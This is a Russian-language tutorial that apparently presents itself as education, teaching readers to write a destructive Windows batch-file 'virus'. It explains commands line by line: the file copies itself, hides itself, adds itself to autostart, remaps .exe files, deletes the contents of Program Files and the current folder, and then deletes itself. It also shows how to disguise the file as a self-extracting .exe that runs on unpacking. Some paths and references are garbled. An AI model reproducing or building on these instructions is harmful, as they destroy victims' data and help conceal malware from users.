Как написать простейший вирус
Эта статья не для того, чтобы научить вредительству, эта статья для того, чтобы помочь пониманию устройства большинства вируса с тем, чтобы знать как с ними бороться и чего не следует делать наверняка с незнакомым файлом. Итак:
С первого взгляда ничего страшного — всего несколько коротких слов-команд. Но на деле, если поместить этот файл в системную папку «system32\drivers\etc» и прописать его в автозагрузку, чтобы он запускался при загрузке системы, то, после перезапуска компьютера, невозможно будет открыть какую-либо программу или выбрать другое действие на рабочем столе. Не рекомендуется повторять эти действия, если нет навыков работы с системным реестром!
Вместо telnetdrive.bat попробуйте вписать безопасные команды для запуска: Calc (калькулятора), Taskmgr (диспетчера задач) или Mspaint (программы рисования).
С чего начать
Пришло время изучить небольшую общую инструкцию по «изготовлению» таких файлов.
Первым делом открываем блокнот;
Заносим туда команды, т.е. создаём в нём «тело» вируса;
Сохраняем свой труд через Файл -> Сохранить как;
Теперь осталось изменить расширение файла .txt на .bat и, вместо сохранённого названия, вписать нужное, которое будет использоваться.
Создаём первый файл-вирус
Простой вирус написан и сохранён в файл. Теперь бы неплохо узнать, что же прописали в тело вируса, сохранённого в файле.
Начинаем разбираться по порядку с первой строки:
@Echo off – без этой команды всё, что написано, высвечивалось бы на экране монитора.
Date11.14 – указывает на дату создания.
If exist c:sky.bat goto abc – проверка существования на диске С файла sky.bat и если его нет
Copy %0 c:sky.bat – размножает себя, изменив первоначальное имя файла на sky.bat
Attrib +h c:sky.bat – скрывает созданный файл от посторонних глаз.
Echo c:sky.bat >>autoexec.bat – вирус прописывается в автозагрузку.
:abc – если он есть, выполнение программы перейдёт сюда.
Далее идут небольшие шалости:
md CRECK – создаёт нужную или ненужную папку, смотря какая цель у создателя вируса.
md NEW – такими папками можно заполнить весь жёсткий диск у пользователя.
Label E: LUZER – прописывает название логического диска Е. В данном случае LUZER.
assoc .exe=.mp3 – расширение .exe будет ассоциироваться, как .mp
del c:Program Files /q –всё, что было в папке Program Files удалится.
del *.* /q – из каталога, где находится вирус, удалится всё, кроме папки с самим вирусом.
Повеселились достаточно, подумаем и о законе:
del %0 – вирус наделает дел и удалит сам себя.
Осталось последнее, узнать, как же его прячут. Просто! Переформатируют файл из расширения .bat в .exe при помощи архиватора WinRAR. При создании архива помечают – «Создать архив SFX» и устанавливают отметку «Выполнить после распаковки». Естественно, указывают настоящее имя, под которым создан вирус.